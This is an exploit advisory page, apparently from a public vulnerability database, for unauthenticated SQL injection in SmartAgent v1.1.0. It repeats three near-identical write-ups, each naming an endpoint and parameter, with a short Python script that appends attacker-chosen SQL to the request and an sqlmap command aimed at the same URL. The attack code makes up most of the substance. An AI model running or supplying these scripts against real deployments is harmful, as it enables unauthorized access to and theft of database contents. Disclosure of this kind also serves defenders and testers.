SmartAgent 1.1.0 SQL Injection

2024.11.02
Credit: Alter Prime
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi) # Date: 01-10-2024 # Exploit Author: Alter Prime # Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com # Version: Build v1.1.0 # Tested on: Kali Linux An unauthenticated user can inject SQL queries through a POST request to the vulnerable script https://smarts-srlcom.com/privateArea/common/tests/interface.php. The POST request includes the folowing parameters "action=exportNetworkDate&id=1111" and vulnerable parameter is "id". Steps To Reproduce: 1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0 #Python Exploit import requests url = "https://smartagent.[client].com/privateArea/common/tests/interface.php" sqlcommand = input("Enter the command you want to run \(EX: UNION SELECT @@version\): ") postdata = { "action": "exportNetworkDate", "id": "1111" + sqlcommand } response = requests.post(url, data=postdata, verify=False) print(response.text) 2. Alternatively SQLMAP could pe used on the same endpoint sqlmap -u https://smartagent.[client].com/privateArea/common/tests/interface.php. --data "action=exportNetworkDate&id=1111" -p "id" # Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi) # Date: 01-10-2024 # Exploit Author: Alter Prime # Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com # Version: Build v1.1.0 # Tested on: Kali Linux An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/privateArea/common/qoe/sendPushManually.php?id=123. The GET request includes the vulnerable parameter "id". Steps To Reproduce: 1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0 #Python Exploit import requests url = "https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php" sqlcommand = input("Enter the command you want to run \(EX: UNION SELECT @@version\): ") parameter = { "id": "123" + sqlcommand } response = requests.get(url, data=parameter, verify=False) print(response.text) 2. Alternatively SQLMAP could pe used on the same endpoint sqlmap -u https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php?id=123 -p "id" # Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi) # Date: 01-10-2024 # Exploit Author: Alter Prime # Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com # Version: Build v1.1.0 # Tested on: Kali Linux An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/recuperaLog.php?client=1111. The GET request includes the vulnerable parameter "client". Steps To Reproduce: 1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0 #Python Exploit import requests url = "https://smartagent.[client].com/recuperaLog.php" sqlcommand = input("Enter the command you want to run \(EX: UNION SELECT @@version\): ") parameter = { "client": "1111" + sqlcommand } response = requests.get(url, data=parameter, verify=False) print(response.text) 2. Alternatively SQLMAP could pe used on the same endpoint sqlmap -u https://smartagent.[client].com/recuperaLog.php?client=1111 -p "client"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top